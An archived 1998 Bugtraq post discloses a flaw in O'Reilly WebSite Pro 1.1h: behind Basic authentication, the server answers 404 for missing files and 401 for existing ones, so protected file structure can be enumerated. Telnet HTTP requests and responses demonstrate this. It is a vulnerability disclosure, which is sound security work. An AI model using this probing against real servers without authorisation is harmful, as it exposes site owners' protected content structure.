Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_2

Bugtraq archives for 2nd quarter (Apr-Jun) 1998: Flaw in HTTP-Authentication in O'Reilly Website Pro

Flaw in HTTP-Authentication in O'Reilly Website Pro

BarKode (bkarena.cwnet.com)
Fri, 24 Apr 1998 03:14:02 +0000

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Daragh Malone: "Security Hole in Netscape Enterprise Server 3.0"
Previous message: F0RMiCA: "How to exploit AlephOne by JP of AntiOnline"

Greetings...

        I went to download a file I'd stashed away on a machine at work
running Website Pro 1.1h, with HTTP-Authentication required to
access the site at all.  I mistyped the name and to my astonishment
got a 404 error. This only surprised me because I had just started
the browser, and had not yet been prompted for a username and
password (Authentication-basic style).

Problem: You can remotely check for existence of files and
directory structures on a machine running Web Site Pro 1.1.

Observe: Here we will try to access index.html, a file which exists on
the protected host.
thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Date: Fri, 24 Apr 1998 09:33:46 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
WWW-Authenticate: Basic realm="Web Server"
Content-length: 156

Authorization Required

Authentication (Basic) failed or was missing. Connection closed by foreign host. ****** Now we try to access a file that does *not* exist. thunder:~$ telnet protected.host.com 80 Trying 1.2.3.4... Connected to protected.host.com. Escape character is '^]'. GET /nothere.html HTTP/1.0 HTTP/1.0 404 Not Found Date: Fri, 24 Apr 1998 09:35:42 GMT Server: WebSitePro/1.1h Accept-ranges: bytes Content-type: text/html Content-length: 207 404 Not Found

404 Not Found

The requested URL was not found on this server:

/nothere.html

(C:/WebS ite/htdocs/nothere.html)

Connection closed by foreign host. ***** No mention whatsoever of Authentication, the server spewed forth a 404 document, gleefully stating the file we want isn't there. The same situation posed under Apache 1.2.5 returns a '401 Unauthorized' in either situation. Contacted O'Reilly, awaiting response.... -Matt

Next message: Daragh Malone: "Security Hole in Netscape Enterprise Server 3.0"
Previous message: F0RMiCA: "How to exploit AlephOne by JP of AntiOnline"